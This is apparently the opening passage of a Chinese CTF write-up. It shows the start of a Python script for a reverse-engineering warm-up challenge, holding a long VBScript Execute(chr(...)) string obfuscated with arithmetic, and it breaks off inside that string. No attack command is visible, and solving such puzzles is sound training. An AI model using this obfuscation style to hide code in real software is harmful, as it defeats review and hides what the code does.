清明假期玩了两天没怎么打,只做了一点
逆向
签到
解码:
import re
input_str = '''
Execute(chr( 667205/8665 ) & chr( -7671+7786 ) & chr( 8541-8438 ) & chr( 422928/6408 ) & chr( -1948+2059 ) & chr( -3066+3186 ) & chr( 756-724 ) & chr( 4080/120 ) & chr( -3615+3683 ) & chr( -1619+1720 ) & chr( -2679+2776 ) & chr( 659718/5787 ) & chr( 302752/9461 ) & chr( -6627+6694 ) & chr( -4261+4345 ) & chr( 81690/1167 ) & chr( 636180/9220 ) & chr( 538658/6569 ) & chr( -1542+1588 ) & chr( -1644+1676 ) & chr( 122184/1697 ) & chr( 966411/9963 ) & chr( 2186-2068 ) & chr( -5283+5384 ) & chr( 305056/9533 ) & chr( 66402/651 ) & chr( 1141452/9756 ) & chr( 882090/8019 ) & chr( -4243+4275 ) & chr( 2669-2564 ) & chr( 83+27 ) & chr( 254880/7965 ) & chr( -1291+1379 ) & chr( -4699+4788 ) & chr( 4730-4663 ) & chr( -1179+1263 ) & chr( 5274-5204 ) & chr( 210144/6567 ) & chr( -6803+6853 ) & chr( 6655-6607 ) & chr( 4067-4017 ) & chr( 121900/2300 ) & chr( -6158+6191 ) & chr( 11934/351 ) & chr( 64883/4991 ) & chr( 65420/6542 ) & chr( 3781-3679 ) & chr( 1612-1504 ) & chr( 892788/9204 ) & chr( 927618/9006 ) & chr( -6692+6724 ) & chr( 410591/6731 ) & chr( 6675-6643 ) & chr( 697880/9560 ) & chr( 4250-4140 ) & chr( 5464-5352 ) & chr( -1082+1199 ) & chr( 3343-3227 ) & chr( 1211-1145 ) & chr( 482406/4346 ) & chr( -5549+5669 ) & chr( -5150+5190 ) & chr( 4400-4366 ) & chr( -3277+3346 ) & chr( -6649+6759 ) & chr( -5669+5785 ) & chr( -6734+6835 ) & chr( 9757-9643 ) & chr( 109-77 ) & chr( 5620-5504 ) & chr( -2887+2991 ) & chr( -3081+3182 ) & chr( -5109+5141 ) & chr( 699860/9998 ) & chr( -3603+3679 ) & chr( 1631-1566 ) & chr( 445-374 ) & chr( 294118/5071 ) & chr( -1115+1149 ) & chr( 222376/5054 ) & chr( 8137-8105 ) & chr( -1653+1687 ) & chr( 357104/4058 ) & chr( 1650-1561 ) & chr( -9501+9568 ) & chr( 1047-963 ) & chr( 2540-2470 ) & chr( 1692-1658 ) & chr( 9947-9906 ) & chr( 9186-9173 ) & chr( -2846+2856 ) & chr( 425187/3573 ) & chr( -3066+3167 ) & chr( 2850-2748 ) & chr( -2992+3090 ) & chr( 958230/8190 ) & chr( 869295/7305 ) & chr( 3380-3275 ) & chr( -7338+7455 ) & chr( 408848/4048 ) & chr( 9211-9179 ) & chr( -2437+2498 ) & chr( 1672-1640 ) & chr( 2378-2344 ) & chr( 544749/9557 ) & chr( 351120/7315 ) & chr( 773800/7738 ) & chr( 2033-1931 ) & chr( -8059+8111 ) & chr( -4731+4783 ) & chr( -9204+9252 ) & chr( -4261+4316 ) & chr( 850521/8421 ) & chr( -7011+7112 ) & chr( 292272/6089 ) & chr( -8609+8666 ) & chr( -2921+2972 ) & chr( 6772-6672 ) & chr( 487611/9561 ) & chr( -6754+6802 ) & chr( 464835/8155 ) & chr( -939+987 ) & chr( 421173/7389 ) & chr( -8145+8201 ) & chr( 9368-9268 ) & chr( -7682+7738 ) & chr( -8646+8699 ) & chr( 484612/4996 ) & chr( 286832/5516 ) & chr( -9710+9760 ) & chr( 884156/9022 ) & chr( 7080-6979 ) & chr( 265477/5009 ) & chr( 6+49 ) & chr( 5395-5298 ) & chr( 6645-6595 ) & chr( -9706+9763 ) & chr( -6697+6752 ) & chr( 927-870 ) & chr( 4048-3946 ) & chr( 34398/702 ) & chr( 825675/8175 ) & chr( -438+491 ) & chr( 87808/1792 ) & chr( -2601+2653 ) & chr( 420228/7782 ) & chr( -5266+5317 ) & chr( 53059/547 ) & chr( 477054/9354 ) & chr( 9238-9189 ) & chr( 799112/7912 ) & chr( 3340-3284 ) & chr( 8544-8444 ) & chr( 1220-1171 ) & chr( -7192+7245 ) & chr( 73629/729 ) & chr( 6523-6473 ) & chr( 2761-2659 ) & chr( 358124/3692 ) & chr( -6167+6266 ) & chr( -3842+3894 ) & chr( 7840-7739 ) & chr( -3980+4036 ) & chr( 987-935 ) & chr( 6868/68 ) & chr( -559+656 ) & chr( 6513-6465 ) & chr( 843300/8433 ) & chr( -8159+8261 ) & chr( -753+807 ) & chr( 278700/5574 ) & chr( 5600/112 ) & chr( -549+646 ) & chr( -7697+7750 ) & chr( 390292/7364 ) & chr( 988020/9980 ) & chr( -3250+3302 ) & chr( 6295-6195 ) & chr( 4342-4242 ) & chr( -9602+9704 ) & chr( 1312-1214 ) & chr( 1065-1012 ) & chr( 1122/22 ) & chr( 191012/3604 ) & chr( 330775/3275 ) & chr( 226848/2224 ) & chr( 4973-4922 ) & chr( 369357/3657 ) & chr( -7229+7282 ) & chr( 588/12 ) & chr( 57570/570 ) & chr( 4554-4498 ) & chr( 483924/4938 ) & chr( 485600/9712 ) & chr( 5051-4998 ) & chr( 8467-8417 ) & chr( -6799+6855 ) & chr( 668360/6820 ) & chr( 428008/7643 ) & chr( -309+359 ) & chr( -7495+7549 ) & chr( 198200/1982 ) & chr( -4298+4351 ) & chr( 2979-2928 ) & chr( -391+443 ) & chr( -5951+6006 ) & chr( -2271+2372 ) & chr( 1431-1382 ) & chr( -2812+2866 ) & chr( 4906-4853 ) & chr( -5308+5365 ) & chr( -8587+8636 ) & chr( -1003+1053 ) & chr( 468741/4641 ) & chr( 8449-8392 ) & chr( 14877/261 ) & chr( -5097+5146 ) & chr( 6695-6646 ) & chr( -2866+2922 ) & chr( 483786/9486 ) & chr( -4142+4193 ) & chr( 2347-2296 ) & chr( -1784+1833 ) & chr( 116229/2193 ) & chr( -1099+1148 ) & chr( 8230-8180 ) & chr( -4351+4406 ) & chr( 1975-1924 ) & chr( 779229/7871 ) & chr( 102960/1040 ) & chr( 67830/1330 ) & chr( -4771+4873 ) & chr( -32+129 ) & chr( 155456/2776 ) & chr( 9798-9700 ) & chr( 4944-4894 ) & chr( -2496+2594 ) & chr( 5495-5444 ) & chr( 8113-8015 ) & chr( -8444+8496 ) & chr( 3896-3847 ) & chr( 6306-6255 ) & chr( 1284-1185 ) & chr( 1003986/9843 ) & chr( -1321+1371 ) & chr( 2676-2578 ) & chr( -5421+5521 ) & chr( 564186/5757 ) & chr( 6608-6559 ) & chr( 7038-6937 ) & chr( 209720/3745 ) & chr( -616+715 ) & chr( 9766-9709 ) & chr( 2111-2012 ) & chr( 528993/9981 ) & chr( 1901-1851 ) & chr( 281344/5024 ) & chr( 5695-5641 ) & chr( 4815-4762 ) & chr( 399556/3956 ) & chr( 572730/5615 ) & chr( -5718+5817 ) & chr( 21+27 ) & chr( 4532-4475 ) & chr( -8446+8499 ) & chr( 5786-5689 ) & chr( 4177-4121 ) & chr( -8411+8511 ) & chr( -9499+9599 ) & chr( 479528/8563 ) & chr( 6850-6793 ) & chr( -3725+3823 ) & chr( -8692+8743 ) & chr( 284298/2901 ) & chr( 214302/4202 ) & chr( 576675/5825 ) & chr( -4565+4667 ) & chr( -7223+7321 ) & chr( 383278/3911 ) & chr( -2540+2590 ) & chr( 35+13 ) & chr( -5549+5597 ) & chr( 969122/9889 ) & chr( 964712/9844 ) & chr( -6231+6328 ) & chr( -1560+1660 ) & chr( -7416+7514 ) & chr( 609144/5972 ) & chr( 471432/9066 ) & chr( -4500+4597 ) & chr( 8620-8566 ) & chr( 7113-7014 ) & chr( -2488+2588 ) & chr( -3599+3651 ) & chr( 211956/6234 ) & chr( 1697-1665 ) & chr( -5122+5161 ) & chr( -3189+3221 ) & chr( -5840+114 ) & chr( -37790+6278 ) & chr( -8.231351E+07/3957 ) & chr( -14110+7864 ) & chr( -30457-1205 ) & chr( 9930-9863 ) & chr( 107-55 ) & chr( 517-7291 ) & chr( -31263+6916 ) & chr( -29685+9083 ) & chr( -2.138515E+07/3442 ) & chr( -26304-1370 ) & chr( -1.510879E+08/6060 ) & chr( -903-3261 ) & chr( -22484-8007 ) & chr( -34437+5126 ) & chr( -10635+3856 ) & chr( -1.97004E+08/9374 ) & chr( -1.079768E+08/6550 ) & chr( -2.533546E+07/3739 ) & chr( -25645+6931 ) & chr( -1.720817E+08/7056 ) & chr( -12498+5774 ) & chr( -2.164872E+08/7546 ) & chr( -8955-8316 ) & chr( -3584+3597 ) & chr( -1280+1290 ) & chr( 795633/7041 ) & chr( 291669/2451 ) & chr( 9044-8942 ) & chr( 264014/2614 ) & chr( -7841+7873 ) & chr( 10919/179 ) & chr( 22272/696 ) & chr( -8135+8169 ) & chr( -5733+5847 ) & chr( 371547/3753 ) & chr( 473980/9115 ) & chr( 391-284 ) & chr( -1824+1925 ) & chr( -1707+1828 ) & chr( 2151-2117 ) & chr( 2535/195 ) & chr( 7236-7226 ) & chr( 58097/4469 ) & chr( 2710/271 ) & chr( 118677/3043 ) & chr( -7992+8024 ) & chr( -5.682766E+07/8145 ) & chr( -3.747722E+07/1805 ) & chr( -20535-2876 ) & chr( -5076000/750 ) & chr( -28220-733 ) & chr( -33583+7603 ) & chr( 7730-7648 ) & chr( 7057-6990 ) & chr( 338728/6514 ) & chr( -4.203267E+07/6205 ) & chr( -20128-4219 ) & chr( -29090+8488 ) & chr( -7954+1177 ) & chr( -25730+8808 ) & chr( -23859-3357 ) & chr( -2130+2143 ) & chr( 6827-6817 ) & chr( 4334-4264 ) & chr( 4851-4734 ) & chr( 5121-5011 ) & chr( 7034-6935 ) & chr( 4197-4081 ) & chr( -1823+1928 ) & chr( 1032744/9304 ) & chr( 1547-1437 ) & chr( -7393+7425 ) & chr( 608932/7426 ) & chr( 864513/7389 ) & chr( 1748-1638 ) & chr( 501676/6118 ) & chr( 510473/7619 ) & chr( -6752+6792 ) & chr( -5142+5257 ) & chr( -9558+9635 ) & chr( 7906-7805 ) & chr( 5308-5193 ) & chr( 163300/1420 ) & chr( 10961/113 ) & chr( 740364/7188 ) & chr( -5327+5428 ) & chr( 5703-5659 ) & chr( -7307+7339 ) & chr( 445970/3878 ) & chr( 608-492 ) & chr( -4799+4913 ) & chr( -3687+3762 ) & chr( 9993-9892 ) & chr( 1032493/8533 ) & chr( 103607/2527 ) & chr( 123266/9482 ) & chr( 61520/6152 ) & chr( 251424/7857 ) & chr( 104032/3251 ) & chr( -7228+7260 ) & chr( 239648/7489 ) & chr( -1858+1926 ) & chr( 865515/8243 ) & chr( 818481/7509 ) & chr( 244384/7637 ) & chr( -4252+4359 ) & chr( 10+66 ) & chr( -3202+3303 ) & chr( 466070/4237 ) & chr( 3973-3929 ) & chr( -7658+7690 ) & chr( 563430/5366 ) & chr( 168872/3838 ) & chr( 306144/9567 ) & chr( 158046/1491 ) & chr( 311740/7085 ) & chr( -6862+6894 ) & chr( 621760/5360 ) & chr( -8151+8252 ) & chr( 9608-9499 ) & chr( 309680/2765 ) & chr( 244288/5552 ) & chr( 6191-6159 ) & chr( 705936/6303 ) & chr( 4828-4717 ) & chr( 1097330/9542 ) & chr( 431596/9809 ) & chr( -8819+8851 ) & chr( 546675/4925 ) & chr( 805545/6885 ) & chr( -5087+5203 ) & chr( 1223-1151 ) & chr( 9566-9465 ) & chr( 2413-2293 ) & chr( 4760-4747 ) & chr( -4859+4869 ) & chr( 3357-3325 ) & chr( 667-635 ) & chr( -2223+2255 ) & chr( 4357-4325 ) & chr( 366928/5396 ) & chr( 203175/1935 ) & chr( -7837+7946 ) & chr( 47936/1498 ) & chr( 3589-3474 ) & chr( 254920/6373 ) & chr( 3498-3448 ) & chr( 54113/1021 ) & chr( 9319-9266 ) & chr( 380767/9287 ) & chr( 298804/6791 ) & chr( -5151+5183 ) & chr( 3487-3380 ) & chr( 246760/6169 ) & chr( 7465-7415 ) & chr( -8879+8932 ) & chr( -281+334 ) & chr( 314470/7670 ) & chr( -1151+1164 ) & chr( 4880-4870 ) & chr( 3582-3550 ) & chr( 147008/4594 ) & chr( 169248/5289 ) & chr( -8224+8256 ) & chr( 4654/358 ) & chr( -2894+2904 ) & chr( 3479-3447 ) & chr( 2036-2004 ) & chr( 7024-6992 ) & chr( -8686+8718 ) & chr( -664+703 ) & chr( 53952/1686 ) & chr( -10371+3595 ) & chr( -21805-3310 ) & chr( -1.930486E+08/8525 ) & chr( -6242-530 ) & chr( -2.479211E+08/9214 ) & chr( -28712+8110 ) & chr( 4047-9789 ) & chr( 278397/4419 ) & chr( -6794+6804 ) & chr( 310624/9707 ) & chr( 120896/3778 ) & chr( 6925-6893 ) & chr( 8256-8224 ) & chr( -4736+4843 ) & chr( 1256-1180 ) & chr( 4250-4149 ) & chr( -9132+9242 ) & chr( 173344/5417 ) & chr( -9030+9091 ) & chr( 72-40 ) & chr( 344204/4529 ) & chr( 351985/3485 ) & chr( 6120-6010 ) & chr( 1113-1073 ) & chr( 2781-2666 ) & chr( 6375-6259 ) & chr( 780330/6845 ) & chr( 106050/1414 ) & chr( 1239-1138 ) & chr( -986+1107 ) & chr( 324351/7911 ) & chr( -7872+7885 ) & chr( -1326+1336 ) & chr( 17728/554 ) & chr( 61600/1925 ) & chr( -4930+4962 ) & chr( 113856/3558 ) & chr( -7210+7280 ) & chr( 3126-3015 ) & chr( 9894-9780 ) & chr( 2040-2008 ) & chr( 957810/9122 ) & chr( -1680+1712 ) & chr( -7068+7129 ) & chr( -9765+9797 ) & chr( 4121-4073 ) & chr( -9924+9956 ) & chr( -4370+4454 ) & chr( 437340/3940 ) & chr( 5315-5283 ) & chr( 304500/6090 ) & chr( -6807+6860 ) & chr( 19186/362 ) & chr( -6044+6057 ) & chr( 9876-9866 ) & chr( -2071+2103 ) & chr( 8923-8891 ) & chr( 4890-4858 ) & chr( 7473-7441 ) & chr( 5632-5600 ) & chr( 8294-8262 ) & chr( -271+303 ) & chr( 6410-6378 ) & chr( 5536-5421 ) & chr( 44720/1118 ) & chr( 6272-6167 ) & chr( 26568/648 ) & chr( 233440/7295 ) & chr( -8944+9005 ) & chr( 204192/6381 ) & chr( 5731-5626 ) & chr( 9617-9604 ) & chr( 7388-7378 ) & chr( 960/30 ) & chr( 99008/3094 ) & chr( 8422-8390 ) & chr( 19136/598 ) & chr( -6328+6360 ) & chr( 199712/6241 ) & chr( -2315+2347 ) & chr( -6898+6930 ) & chr( 9875-9768 ) & chr( -4621+4661 ) & chr( -7725+7830 ) & chr( -3507+3548 ) & chr( 4844-4812 ) & chr( 570716/9356 ) & chr( -3814+3846 ) & chr( -1467+1532 ) & chr( 138115/1201 ) & chr( -7634+7733 ) & chr( -7021+7061 ) & chr( 942-865 ) & chr( 924630/8806 ) & chr( 8706-8606 ) & chr( -6756+6796 ) & chr( -5325+5440 ) & chr( 2765-2649 ) & chr( -7079+7193 ) & chr( 2100/28 ) & chr( 8156-8055 ) & chr( -7792+7913 ) & chr( 5324/121 ) & chr( 6423-6391 ) & chr( 5454-5414 ) & chr( -4828+4933 ) & chr( 13504/422 ) & chr( 244552/3176 ) & chr( -3016+3127 ) & chr( -4103+4203 ) & chr( 2567-2535 ) & chr( 435-328 ) & chr( 787-711 ) & chr( 1474-1373 ) & chr( 803550/7305 ) & chr( -5410+5451 ) & chr( -6556+6588 ) & chr( -2204+2247 ) & chr( 223424/6982 ) & chr( -8753+8802 ) & chr( 135872/3088 ) & chr( -7757+7789 ) & chr( 272-223 ) & chr( 340177/8297 ) & chr( 1487-1446 ) & chr( -9083+9115 ) & chr( 7132-7093 ) & chr( 4540-4508 ) & chr( -13541+6804 ) & chr( -7.75285E+07/2501 ) & chr( -32055+4060 ) & chr( -1318-5661 ) & chr( -5.265648E+07/3209 ) & chr( -31857+4377 ) & chr( 585065/9001 ) & chr( -2558+2641 ) & chr( -8549+8616 ) & chr( 6403-6330 ) & chr( 6271-6198 ) & chr( -2.477346E+07/3988 ) & chr( -17020-9885 ) & chr( -2542488/104 ) & chr( -1327+1340 ) & chr( -887+897 ) & chr( -7751+7783 ) & chr( 2629-2597 ) & chr( -6489+6521 ) & chr( 2254-2222 ) & chr( 154518/1981 ) & chr( -764+865 ) & chr( 629040/5242 ) & chr( 1098636/9471 ) & chr( 78793/6061 ) & chr( -7110+7120 ) & chr( -7378+7410 ) & chr( -1777+1809 ) & chr( 2538-2506 ) & chr( 119392/3731 ) & chr( -4327+4340 ) & chr( 10580/1058 ) & chr( -7677+7709 ) & chr( 8254-8222 ) & chr( 3782-3750 ) & chr( 214240/6695 ) & chr( 7006-6967 ) & chr( 8305-8273 ) & chr( 4841-4766 ) & chr( 937-854 ) & chr( 616460/9484 ) & chr( -16-6721 ) & chr( -28078-2921 ) & chr( -24670-3325 ) & chr( -9340+3372 ) & chr( -25211-6560 ) & chr( -22908+5154 ) & chr( 6567-6554 ) & chr( -635+645 ) & chr( -5907+5939 ) & chr( 4841-4809 ) & chr( 20576/643 ) & chr( -2196+2228 ) & chr( 3270-3164 ) & chr( 212384/6637 ) & chr( 509533/8353 ) & chr( 94368/2949 ) & chr( -1648+1696 ) & chr( 23335/1795 ) & chr( -86+96 ) & chr( 209408/6544 ) & chr( 5186-5154 ) & chr( 91072/2846 ) & chr( 8978-8946 ) & chr( 45850/655 ) & chr( 256632/2312 ) & chr( -8647+8761 ) & chr( 5661-5629 ) & chr( 191940/1828 ) & chr( 2132-2100 ) & chr( -9855+9916 ) & chr( 3562-3530 ) & chr( 24864/518 ) & chr( 275424/8607 ) & chr( 3176-3092 ) & chr( 3798-3687 ) & chr( -6055+6087 ) & chr( -6024+6074 ) & chr( -6425+6478 ) & chr( -9745+9798 ) & chr( 23387/1799 ) & chr( -3891+3901 ) & chr( -4637+4669 ) & chr( -3183+3215 ) & chr( 9860-9828 ) & chr( 1677-1645 ) & chr( 3698-3666 ) & chr( -7915+7947 ) & chr( 200128/6254 ) & chr( -3984+4016 ) & chr( 5982-5876 ) & chr( -5627+5659 ) & chr( 6122-6061 ) & chr( -5851+5883 ) & chr( 204520/5113 ) & chr( -566+672 ) & chr( 260512/8141 ) & chr( 7314-7271 ) & chr( -1563+1595 ) & chr( 5079-4964 ) & chr( 11680/292 ) & chr( 8464-8359 ) & chr( 6991-6950 ) & chr( -3136+3168 ) & chr( 4262-4219 ) & chr( 4518-4486 ) & chr( 9317-9210 ) & chr( 7615-7575 ) & chr( 55650/530 ) & chr( 1185-1144 ) & chr( 7853-7812 ) & chr( -3099+3131 ) & chr( 288288/3744 ) & chr( -8871+8982 ) & chr( -8502+8602 ) & chr( 2470-2438 ) & chr( 364100/7282 ) & chr( -8754+8807 ) & chr( 476874/8831 ) & chr( 768-755 ) & chr( 8485-8475 ) & chr( -6548+6580 ) & chr( 68960/2155 ) & chr( 31904/997 ) & chr( 113792/3556 ) & chr( -8387+8419 ) & chr( 116448/3639 ) & chr( 279552/8736 ) & chr( -2637+2669 ) & chr( -5483+5599 ) & chr( 4853-4752 ) & chr( -7090+7199 ) & chr( 544320/4860 ) & chr( 305600/9550 ) & chr( 510570/8370 ) & chr( 72640/2270 ) & chr( 3200-3085 ) & chr( -6820+6860 ) & chr( 396375/3775 ) & chr( -7447+7488 ) & chr( -9189+9202 ) & chr( -4261+4271 ) & chr( 1688-1656 ) & chr( 9083-9051 ) & chr( 9012-8980 ) & chr( -3650+3682 ) & chr( 291424/9107 ) & chr( 842-810 ) & chr( -7058+7090 ) & chr( -7119+7151 ) & chr( -4515+4630 ) & chr( 9315-9275 ) & chr( 2216-2111 ) & chr( -1847+1888 ) & chr( 100192/3131 ) & chr( 8671-8610 ) & chr( -1498+1530 ) & chr( 5376-5261 ) & chr( 965-925 ) & chr( 597628/5638 ) & chr( -6697+6738 ) & chr( 9809-9796 ) & chr( 740-730 ) & chr( 4866-4834 ) & chr( 8064-8032 ) & chr( 8204-8172 ) & chr( 6706-6674 ) & chr( -3302+3334 ) & chr( -9585+9617 ) & chr( 8259-8227 ) & chr( 9319-9287 ) & chr( 6042-5927 ) & chr( -4563+4603 ) & chr( 843124/7954 ) & chr( -468+509 ) & chr( 91-59 ) & chr( 55+6 ) & chr( -470+502 ) & chr( 8800-8684 ) & chr( -732+833 ) & chr( 1859-1750 ) & chr( -9065+9177 ) & chr( -3551+3564 ) & chr( -5998+6008 ) & chr( 309248/9664 ) & chr( 78080/2440 ) & chr( 1337-1305 ) & chr( 1031-999 ) & chr( -2405+2483 ) & chr( 900011/8911 ) & chr( 9591-9471 ) & chr( 3993-3877 ) & chr( 37024/2848 ) & chr( 2372-2362 ) & chr( -1999+2031 ) & chr( 402-370 ) & chr( 2339-2307 ) & chr( 215232/6726 ) & chr( 56706/4362 ) & chr( 88610/8861 ) & chr( 6347-6315 ) & chr( -1057+1089 ) & chr( -8215+8247 ) & chr( -5359+5391 ) & chr( 360048/9232 ) & chr( 150208/4694 ) & chr( 549760/6872 ) & chr( 709710/8655 ) & chr( -9253+9324 ) & chr( -1875+1940 ) & chr( 3060-9834 ) & chr( -1.219054E+08/5007 ) & chr( -16837-3765 ) & chr( -13859+7384 ) & chr( -40413+8132 ) & chr( -7.735399E+07/3455 ) & chr( -3620+3633 ) & chr( 7370/737 ) & chr( 9207-9175 ) & chr( 21216/663 ) & chr( -8881+8913 ) & chr( 59712/1866 ) & chr( 1881-1776 ) & chr( 5987-5955 ) & chr( 213378/3498 ) & chr( 185536/5798 ) & chr( -1106+1154 ) & chr( -6274+6306 ) & chr( 244-186 ) & chr( -7680+7712 ) & chr( 417216/3936 ) & chr( 1383-1351 ) & chr( 346419/5679 ) & chr( -7913+7945 ) & chr( 3201-3153 ) & chr( 268160/8380 ) & chr( -5532+5590 ) & chr( -6959+6991 ) & chr( 3356-3245 ) & chr( -7222+7339 ) & chr( 9549-9433 ) & chr( -426+498 ) & chr( 510555/5055 ) & chr( 699720/5831 ) & chr( -5601+5633 ) & chr( 260653/4273 ) & chr( 26752/836 ) & chr( 4148-4114 ) & chr( -6483+6517 ) & chr( 120601/9277 ) & chr( 92430/9243 ) & chr( 3296/103 ) & chr( 3355-3323 ) & chr( 6661-6629 ) & chr( -309+341 ) & chr( -4300+4370 ) & chr( 132090/1190 ) & chr( 296742/2603 ) & chr( -568+600 ) & chr( 576016/5143 ) & chr( 4279-4168 ) & chr( -3514+3629 ) & chr( -7862+7894 ) & chr( 201544/3304 ) & chr( 6720/210 ) & chr( -1246+1295 ) & chr( 6539-6507 ) & chr( 7479-7395 ) & chr( 685536/6176 ) & chr( -7312+7344 ) & chr( -2052+2128 ) & chr( -8510+8611 ) & chr( 311630/2833 ) & chr( 8715-8675 ) & chr( -6734+6849 ) & chr( -5728+5805 ) & chr( 9955-9854 ) & chr( 269445/2343 ) & chr( -4059+4174 ) & chr( 47142/486 ) & chr( 921-818 ) & chr( 663-562 ) & chr( 164328/4008 ) & chr( 23634/1818 ) & chr( 82110/8211 ) & chr( 5730-5698 ) & chr( 245312/7666 ) & chr( 1656-1624 ) & chr( 269536/8423 ) & chr( 168864/5277 ) & chr( -2835+2867 ) & chr( -9348+9380 ) & chr( 216128/6754 ) & chr( -6873+6978 ) & chr( 8769-8737 ) & chr( -7159+7220 ) & chr( -2374+2406 ) & chr( 145560/3639 ) & chr( 84945/809 ) & chr( 4967-4935 ) & chr( 3533-3490 ) & chr( -8222+8254 ) & chr( -5971+6020 ) & chr( 203811/4971 ) & chr( 64768/2024 ) & chr( -8894+8971 ) & chr( -7605+7716 ) & chr( 7530-7430 ) & chr( 8961-8929 ) & chr( 204800/4096 ) & chr( 34291/647 ) & chr( 5124-5070 ) & chr( 117455/9035 ) & chr( 70910/7091 ) & chr( 191072/5971 ) & chr( -8276+8308 ) & chr( 194464/6077 ) & chr( 1606-1574 ) & chr( 200032/6251 ) & chr( -183+215 ) & chr( 7729-7697 ) & chr( -6288+6320 ) & chr( 563-457 ) & chr( 48544/1517 ) & chr( 504-443 ) & chr( -227+259 ) & chr( 358600/8965 ) & chr( 5705-5599 ) & chr( -4736+4768 ) & chr( 321554/7478 ) & chr( -8525+8557 ) & chr( 402615/3501 ) & chr( 1320/33 ) & chr( 233100/2220 ) & chr( 7463-7422 ) & chr( 8959-8918 ) & chr( 9538-9506 ) & chr( -3809+3886 ) & chr( 17094/154 ) & chr( 3305-3205 ) & chr( 5389-5357 ) & chr( 101450/2029 ) & chr( -2702+2755 ) & chr( 422-368 ) & chr( 3681-3668 ) & chr( 1374-1364 ) & chr( 244192/7631 ) & chr( 2106-2074 ) & chr( 301504/9422 ) & chr( 6788-6756 ) & chr( 275072/8596 ) & chr( -2612+2644 ) & chr( 1544-1512 ) & chr( 263424/8232 ) & chr( 5985-5869 ) & chr( 409555/4055 ) & chr( 7844-7735 ) & chr( 668752/5971 ) & chr( 1110-1078 ) & chr( -880+941 ) & chr( 9828-9796 ) & chr( 610650/5310 ) & chr( -2213+2253 ) & chr( 5697-5592 ) & chr( 340505/8305 ) & chr( 1757-1744 ) & chr( 88340/8834 ) & chr( 2986-2954 ) & chr( -7747+7779 ) & chr( 5952-5920 ) & chr( 6697-6665 ) & chr( 180160/5630 ) & chr( 1671-1639 ) & chr( -8613+8645 ) & chr( 95904/2997 ) & chr( 8994-8879 ) & chr( 7256-7216 ) & chr( -5776+5881 ) & chr( 1529-1488 ) & chr( 179680/5615 ) & chr( -684+745 ) & chr( 119840/3745 ) & chr( 828000/7200 ) & chr( -1371+1411 ) & chr( 2474-2368 ) & chr( 144033/3513 ) & chr( 1617-1604 ) & chr( 9503-9493 ) & chr( -1100+1132 ) & chr( 211680/6615 ) & chr( 7607-7575 ) & chr( 5777-5745 ) & chr( 319712/9991 ) & chr( -9605+9637 ) & chr( 140672/4396 ) & chr( 3740-3708 ) & chr( 92575/805 ) & chr( 9363-9323 ) & chr( 292136/2756 ) & chr( -9536+9577 ) & chr( -9310+9342 ) & chr( 7634-7573 ) & chr( -9716+9748 ) & chr( -7090+7206 ) & chr( 376-275 ) & chr( -6333+6442 ) & chr( 3986-3874 ) & chr( 3115-3102 ) & chr( -2171+2181 ) & chr( 100544/3142 ) & chr( 74-42 ) & chr( -1400+1432 ) & chr( 81504/2547 ) & chr( 5073-5041 ) & chr( 4596-4564 ) & chr( 9048-9016 ) & chr( -2733+2765 ) & chr( -4650+4663 ) & chr( -151+161 ) & chr( 10592/331 ) & chr( 3163-3131 ) & chr( 4722-4690 ) & chr( 30624/957 ) & chr( 2545-2513 ) & chr( 251232/7851 ) & chr( -2926+2958 ) & chr( 239584/7487 ) & chr( 389-350 ) & chr( -2+34 ) & chr( -5.053404E+07/7460 ) & chr( -26034+1687 ) & chr( -19313-1289 ) & chr( -30-6697 ) & chr( -17366-1346 ) & chr( -15077-1903 ) & chr( -6552-432 ) & chr( -13927-3764 ) & chr( -37232+7921 ) & chr( 1107-7886 ) & chr( -15477-5539 ) & chr( -1.750707E+07/1062 ) & chr( -3.826407E+07/5647 ) & chr( 364959/5793 ) & chr( 2034-2024 ) & chr( -7296+7328 ) & chr( -3111+3143 ) & chr( -3156+3188 ) & chr( 7990-7958 ) & chr( 166496/5203 ) & chr( -4151+4183 ) & chr( 4071-4039 ) & chr( 9102-9070 ) & chr( -6166+6234 ) & chr( 283185/2697 ) & chr( 3833-3724 ) & chr( 119776/3743 ) & chr( 658224/5877 ) & chr( 7881-7773 ) & chr( 390328/4024 ) & chr( 8122-8017 ) & chr( 934010/8491 ) & chr( 579751/8653 ) & chr( -8024+8128 ) & chr( 57036/588 ) & chr( 2457-2343 ) & chr( 9781-9737 ) & chr( -5599+5631 ) & chr( -7710+7809 ) & chr( -4501+4606 ) & chr( 625072/5581 ) & chr( 783432/7533 ) & chr( 877488/8688 ) & chr( 6473-6359 ) & chr( 5963-5897 ) & chr( 150282/1242 ) & chr( -9775+9891 ) & chr( -7486+7587 ) & chr( 565-552 ) & chr( 5581-5571 ) & chr( 771-739 ) & chr( 69824/2182 ) & chr( 4603-4571 ) & chr( -5709+5741 ) & chr( 8242-8210 ) & chr( 94112/2941 ) & chr( 100352/3136 ) & chr( -8344+8376 ) & chr( -1824+1936 ) & chr( 6678-6570 ) & chr( 638454/6582 ) & chr( 6614-6509 ) & chr( 1012990/9209 ) & chr( 8744-8677 ) & chr( 561912/5403 ) & chr( 444163/4579 ) & chr( 10089-9975 ) & chr( 280960/8780 ) & chr( 320128/5248 ) & chr( -3399+3431 ) & chr( -1771+1836 ) & chr( 5417-5302 ) & chr( -1824+1923 ) & chr( 212600/5315 ) & chr( -4973+5050 ) & chr( 60060/572 ) & chr( 639000/6390 ) & chr( 355520/8888 ) & chr( 866410/7534 ) & chr( 5901-5824 ) & chr( 9869-9768 ) & chr( -4100+4215 ) & chr( 9973-9858 ) & chr( 601594/6202 ) & chr( 857887/8329 ) & chr( -7663+7764 ) & chr( -205+249 ) & chr( -5719+5751 ) & chr( 8618-8506 ) & chr( 822732/7412 ) & chr( 9707-9592 ) & chr( 106832/2428 ) & chr( 1917-1885 ) & chr( 7491-7442 ) & chr( 263507/6427 ) & chr( -3050+3091 ) & chr( 6688/209 ) & chr( 3579-3540 ) & chr( 62400/1950 ) & chr( -5.533603E+07/8508 ) & chr( -1.094461E+07/378 ) & chr( -19198-7803 ) & chr( -1503-5013 ) & chr( -22047-8352 ) & chr( -9364+9447 ) & chr( -3664+3731 ) & chr( 7198-7125 ) & chr( 6274-6201 ) & chr( -16376+9628 ) & chr( -3.882402E+07/1232 ) & chr( -35990+7452 ) & chr( 59020/4540 ) & chr( 32900/3290 ) & chr( 51776/1618 ) & chr( -7782+7814 ) & chr( 9795-9763 ) & chr( 254592/7956 ) & chr( 83520/2610 ) & chr( 7721-7689 ) & chr( -7133+7165 ) & chr( 1340-1308 ) & chr( 330066/3334 ) & chr( -9106+9211 ) & chr( 6064-5952 ) & chr( 6286-6182 ) & chr( -9220+9321 ) & chr( -2056+2170 